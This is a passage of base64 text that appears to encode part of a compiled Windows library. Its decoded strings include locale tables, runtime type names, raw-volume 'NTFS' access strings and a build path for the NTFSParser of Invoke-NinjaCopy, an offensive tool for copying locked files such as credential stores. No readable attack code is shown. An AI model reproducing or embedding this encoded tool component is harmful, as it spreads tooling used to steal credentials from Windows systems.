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AAAAYQBmAC0AWgBBAAAAawBhAC0ARwBFAAAAZgBvAC0ARgBPAAAAaABpAC0ASQBOAAAAbQB0AC0ATQBUAAAAcwBlAC0ATgBPAAAAbQBzAC0ATQBZAAAAawBrAC0ASwBaAAAAawB5AC0ASwBHAAAAcwB3AC0ASwBFAAAAdQB6AC0AVQBaAC0ATABhAHQAbgAAAAAAdAB0AC0AUgBVAAAAYgBuAC0ASQBOAAAAcABhAC0ASQBOAAAAZwB1AC0ASQBOAAAAdABhAC0ASQBOAAAAdABlAC0ASQBOAAAAawBuAC0ASQBOAAAAbQBsAC0ASQBOAAAAbQByAC0ASQBOAAAAcwBhAC0ASQBOAAAAbQBuAC0ATQBOAAAAYwB5AC0ARwBCAAAAZwBsAC0ARQBTAAAAawBvAGsALQBJAE4AAAAAAHMAeQByAC0AUwBZAAAAAABkAGkAdgAtAE0AVgAAAAAAcQB1AHoALQBCAE8AAAAAAG4AcwAtAFoAQQAAAG0AaQAtAE4AWgAAAGEAcgAtAEkAUQAAAGQAZQAtAEMASAAAAGUAbgAtAEcAQgAAAGUAcwAtAE0AWAAAAGYAcgAtAEIARQAAAGkAdAAtAEMASAAAAG4AbAAtAEIARQAAAG4AbgAtAE4ATwAAAHAAdAAtAFAAVAAAAHMAcgAtAFMAUAAtAEwAYQB0AG4AAAAAAHMAdgAtAEYASQAAAGEAegAtAEEAWgAtAEMAeQByAGwAAAAAAHMAZQAtAFMARQAAAG0AcwAtAEIATgAAAHUAegAtAFUAWgAtAEMAeQByAGwAAAAAAHEAdQB6AC0ARQBDAAAAAABhAHIALQBFAEcAAAB6AGgALQBIAEsAAABkAGUALQBBAFQAAABlAG4ALQBBAFUAAABlAHMALQBFAFMAAABmAHIALQBDAEEAAABzAHIALQBTAFAALQBDAHkAcgBsAAAAAABzAGUALQBGAEkAAABxAHUAegAtAFAARQAAAAAAYQByAC0ATABZAAAAegBoAC0AUwBHAAAAZABlAC0ATABVAAAAZQBuAC0AQwBBAAAAZQBzAC0ARwBUAAAAZgByAC0AQwBIAAAAaAByAC0AQgBBAAAAcwBtAGoALQBOAE8AAAAAAGEAcgAtAEQAWgAAAHoAaAAtAE0ATwAAAGQAZQAtAEwASQAAAGUAbgAtAE4AWgAAAGUAcwAtAEMAUgAAAGYAcgAtAEwAVQAAAGIAcwAtAEIAQQAtAEwAYQB0AG4AAAAAAHMAbQBqAC0AUwBFAAAAAABhAHIALQBNAEEAAABlAG4ALQBJAEUAAABlAHMALQBQAEEAAABmAHIALQBNAEMAAABzAHIALQBCAEEALQBMAGEAdABuAAAAAABzAG0AYQAtAE4ATwAAAAAAYQByAC0AVABOAAAAZQBuAC0AWgBBAAAAZQBzAC0ARABPAAAAcwByAC0AQgBBAC0AQwB5AHIAbAAAAAAAcwBtAGEALQBTAEUAAAAAAGEAcgAtAE8ATQAAAGUAbgAtAEoATQAAAGUAcwAtAFYARQAAAHMAbQBzAC0ARgBJAAAAAABhAHIALQBZAEUAAABlAG4ALQBDAEIAAABlAHMALQBDAE8AAABzAG0AbgAtAEYASQAAAAAAYQByAC0AUwBZAAAAZQBuAC0AQgBaAAAAZQBzAC0AUABFAAAAYQByAC0ASgBPAAAAZQBuAC0AVABUAAAAZQBzAC0AQQBSAAAAYQByAC0ATABCAAAAZQBuAC0AWgBXAAAAZQBzAC0ARQBDAAAAYQByAC0ASwBXAAAAZQBuAC0AUABIAAAAZQBzAC0AQwBMAAAAYQByAC0AQQBFAAAAZQBzAC0AVQBZAAAAYQByAC0AQgBIAAAAZQBzAC0AUABZAAAAYQByAC0AUQBBAAAAZQBzAC0AQgBPAAAAZQBzAC0AUwBWAAAAZQBzAC0ASABOAAAAZQBzAC0ATgBJAAAAZQBzAC0AUABSAAAAegBoAC0AQwBIAFQAAAAAAHMAcgAAAAAAYQBmAC0AegBhAAAAYQByAC0AYQBlAAAAYQByAC0AYgBoAAAAYQByAC0AZAB6AAAAYQByAC0AZQBnAAAAYQByAC0AaQBxAAAAYQByAC0AagBvAAAAYQByAC0AawB3AAAAYQByAC0AbABiAAAAYQByAC0AbAB5AAAAYQByAC0AbQBhAAAAYQByAC0AbwBtAAAAYQByAC0AcQBhAAAAYQByAC0AcwBhAAAAYQByAC0AcwB5AAAAYQByAC0AdABuAAAAYQByAC0AeQBlAAAAYQB6AC0AYQB6AC0AYwB5AHIAbAAAAAAAYQB6AC0AYQB6AC0AbABhAHQAbgAAAAAAYgBlAC0AYgB5AAAAYgBnAC0AYgBnAAAAYgBuAC0AaQBuAAAAYgBzAC0AYgBhAC0AbABhAHQAbgAAAAAAYwBhAC0AZQBzAAAAYwBzAC0AYwB6AAAAYwB5AC0AZwBiAAAAZABhAC0AZABrAAAAZABlAC0AYQB0AAAAZABlAC0AYwBoAAAAZABlAC0AZABlAAAAZABlAC0AbABpAAAAZABlAC0AbAB1AAAAZABpAHYALQBtAHYAAAAAAGUAbAAtAGcAcgAAAGUAbgAtAGEAdQAAAGUAbgAtAGIAegAAAGUAbgAtAGMAYQAAAGUAbgAtAGMAYgAAAGUAbgAtAGcAYgAAAGUAbgAtAGkAZQAAAGUAbgAtAGoAbQAAAGUAbgAtAG4AegAAAGUAbgAtAHAAaAAAAGUAbgAtAHQAdAAAAGUAbgAtAHUAcwAAAGUAbgAtAHoAYQAAAGUAbgAtAHoAdwAAAGUAcwAtAGEAcgAAAGUAcwAtAGIAbwAAAGUAcwAtAGMAbAAAAGUAcwAtAGMAbwAAAGUAcwAtAGMAcgAAAGUAcwAtAGQAbwAAAGUAcwAtAGUAYwAAAGUAcwAtAGUAcwAAAGUAcwAtAGcAdAAAAGUAcwAtAGgAbgAAAGUAcwAtAG0AeAAAAGUAcwAtAG4AaQAAAGUAcwAtAHAAYQAAAGUAcwAtAHAAZQAAAGUAcwAtAHAAcgAAAGUAcwAtAHAAeQAAAGUAcwAtAHMAdgAAAGUAcwAtAHUAeQAAAGUAcwAtAHYAZQAAAGUAdAAtAGUAZQAAAGUAdQAtAGUAcwAAAGYAYQAtAGkAcgAAAGYAaQAtAGYAaQAAAGYAbwAtAGYAbwAAAGYAcgAtAGIAZQAAAGYAcgAtAGMAYQAAAGYAcgAtAGMAaAAAAGYAcgAtAGYAcgAAAGYAcgAtAGwAdQAAAGYAcgAtAG0AYwAAAGcAbAAtAGUAcwAAAGcAdQAtAGkAbgAAAGgAZQAtAGkAbAAAAGgAaQAtAGkAbgAAAGgAcgAtAGIAYQAAAGgAcgAtAGgAcgAAAGgAdQAtAGgAdQAAAGgAeQAtAGEAbQAAAGkAZAAtAGkAZAAAAGkAcwAtAGkAcwAAAGkAdAAtAGMAaAAAAGkAdAAtAGkAdAAAAGoAYQAtAGoAcAAAAGsAYQAtAGcAZQAAAGsAawAtAGsAegAAAGsAbgAtAGkAbgAAAGsAbwBrAC0AaQBuAAAAAABrAG8ALQBrAHIAAABrAHkALQBrAGcAAABsAHQALQBsAHQAAABsAHYALQBsAHYAAABtAGkALQBuAHoAAABtAGsALQBtAGsAAABtAGwALQBpAG4AAABtAG4ALQBtAG4AAABtAHIALQBpAG4AAABtAHMALQBiAG4AAABtAHMALQBtAHkAAABtAHQALQBtAHQAAABuAGIALQBuAG8AAABuAGwALQBiAGUAAABuAGwALQBuAGwAAABuAG4ALQBuAG8AAABuAHMALQB6AGEAAABwAGEALQBpAG4AAABwAGwALQBwAGwAAABwAHQALQBiAHIAAABwAHQALQBwAHQAAABxAHUAegAtAGIAbwAAAAAAcQB1AHoALQBlAGMAAAAAAHEAdQB6AC0AcABlAAAAAAByAG8ALQByAG8AAAByAHUALQByAHUAAABzAGEALQBpAG4AAABzAGUALQBmAGkAAABzAGUALQBuAG8AAABzAGUALQBzAGUAAABzAGsALQBzAGsAAABzAGwALQBzAGkAAABzAG0AYQAtAG4AbwAAAAAAcwBtAGEALQBzAGUAAAAAAHMAbQBqAC0AbgBvAAAAAABzAG0AagAtAHMAZQAAAAAAcwBtAG4ALQBmAGkAAAAAAHMAbQBzAC0AZgBpAAAAAABzAHEALQBhAGwAAABzAHIALQBiAGEALQBjAHkAcgBsAAAAAABzAHIALQBiAGEALQBsAGEAdABuAAAAAABzAHIALQBzAHAALQBjAHkAcgBsAAAAAABzAHIALQBzAHAALQBsAGEAdABuAAAAAABzAHYALQBmAGkAAABzAHYALQBzAGUAAABzAHcALQBrAGUAAABzAHkAcgAtAHMAeQAAAAAAdABhAC0AaQBuAAAAdABlAC0AaQBuAAAAdABoAC0AdABoAAAAdABuAC0AegBhAAAAdAByAC0AdAByAAAAdAB0AC0AcgB1AAAAdQBrAC0AdQBhAAAAdQByAC0AcABrAAAAdQB6AC0AdQB6AC0AYwB5AHIAbAAAAAAAdQB6AC0AdQB6AC0AbABhAHQAbgAAAAAAdgBpAC0AdgBuAAAAeABoAC0AegBhAAAAegBoAC0AYwBoAHMAAAAAAHoAaAAtAGMAaAB0AAAAAAB6AGgALQBjAG4AAAB6AGgALQBoAGsAAAB6AGgALQBtAG8AAAB6AGgALQBzAGcAAAB6AGgALQB0AHcAAAB6AHUALQB6AGEAAADYNAEQ5DQBEOw0ARD4NAEQBDUBEBA1ARAcNQEQKDUBEDA1ARA4NQEQRDUBEFA1ARBaNQEQCDoBEBw6ARA4OgEQTDoBEGw6ARBcNQEQZDUBEGw1ARBwNQEQdDUBEHg1ARB8NQEQgDUBEIQ1ARCINQEQlDUBEJg1ARCcNQEQoDUBEKQ1ARCoNQEQrDUBELA1ARC0NQEQuDUBELw1ARDANQEQxDUBEMg1ARDMNQEQ0DUBENQ1ARDYNQEQ3DUBEOA1ARDkNQEQ6DUBEOw1ARDwNQEQ9DUBEPg1ARD8NQEQADYBEAQ2ARAINgEQDDYBEBA2ARAcNgEQKDYBEDA2ARA8NgEQVDYBEGA2ARB0NgEQlDYBELQ2ARDUNgEQ9DYBEBQ3ARA4NwEQVDcBEHg3ARCYNwEQwDcBENw3ARDsNwEQ8DcBEPg3ARAIOAEQLDgBEDQ4ARBAOAEQUDgBEGw4ARCMOAEQtDgBENw4ARAEOQEQMDkBEEw5ARBwOQEQlDkBEMA5ARDsOQEQWjUBEF9fYmFzZWQoAAAAAF9fY2RlY2wAX19wYXNjYWwAAAAAX19zdGRjYWxsAAAAX190aGlzY2FsbAAAX19mYXN0Y2FsbAAAX19jbHJjYWxsAAAAX19lYWJpAABfX3B0cjY0AF9fcmVzdHJpY3QAAF9fdW5hbGlnbmVkAHJlc3RyaWN0KAAAACBuZXcAAAAAIGRlbGV0ZQA9AAAAPj4AADw8AAAhAAAAPT0AACE9AABbXQAAb3BlcmF0b3IAAAAALT4AACoAAAArKwAALS0AAC0AAAArAAAAJgAAAC0+KgAvAAAAJQAAADwAAAA8PQAAPgAAAD49AAAsAAAAKCkAAH4AAABeAAAAfAAAACYmAAB8fAAAKj0AACs9AAAtPQAALz0AACU9AAA+Pj0APDw9ACY9AAB8PQAAXj0AAGB2ZnRhYmxlJwAAAGB2YnRhYmxlJwAAAGB2Y2FsbCcAYHR5cGVvZicAAAAAYGxvY2FsIHN0YXRpYyBndWFyZCcAAAAAYHN0cmluZycAAAAAYHZiYXNlIGRlc3RydWN0b3InAABgdmVjdG9yIGRlbGV0aW5nIGRlc3RydWN0b3InAAAAAGBkZWZhdWx0IGNvbnN0cnVjdG9yIGNsb3N1cmUnAAAAYHNjYWxhciBkZWxldGluZyBkZXN0cnVjdG9yJwAAAABgdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGB2ZWN0b3IgZGVzdHJ1Y3RvciBpdGVyYXRvcicAAAAAYHZlY3RvciB2YmFzZSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAYHZpcnR1YWwgZGlzcGxhY2VtZW50IG1hcCcAAGBlaCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAGBlaCB2ZWN0b3IgZGVzdHJ1Y3RvciBpdGVyYXRvcicAYGVoIHZlY3RvciB2YmFzZSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAGBjb3B5IGNvbnN0cnVjdG9yIGNsb3N1cmUnAABgdWR0IHJldHVybmluZycAYEVIAGBSVFRJAAAAYGxvY2FsIHZmdGFibGUnAGBsb2NhbCB2ZnRhYmxlIGNvbnN0cnVjdG9yIGNsb3N1cmUnACBuZXdbXQAAIGRlbGV0ZVtdAAAAYG9tbmkgY2FsbHNpZycAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgbWFuYWdlZCB2ZWN0b3IgZGVzdHJ1Y3RvciBpdGVyYXRvcicAAAAAYGVoIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGBlaCB2ZWN0b3IgdmJhc2UgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAYGR5bmFtaWMgaW5pdGlhbGl6ZXIgZm9yICcAAGBkeW5hbWljIGF0ZXhpdCBkZXN0cnVjdG9yIGZvciAnAAAAAGB2ZWN0b3IgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAGB2ZWN0b3IgdmJhc2UgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAYG1hbmFnZWQgdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAABgbG9jYWwgc3RhdGljIHRocmVhZCBndWFyZCcAIFR5cGUgRGVzY3JpcHRvcicAAAAgQmFzZSBDbGFzcyBEZXNjcmlwdG9yIGF0ICgAIEJhc2UgQ2xhc3MgQXJyYXknAAAg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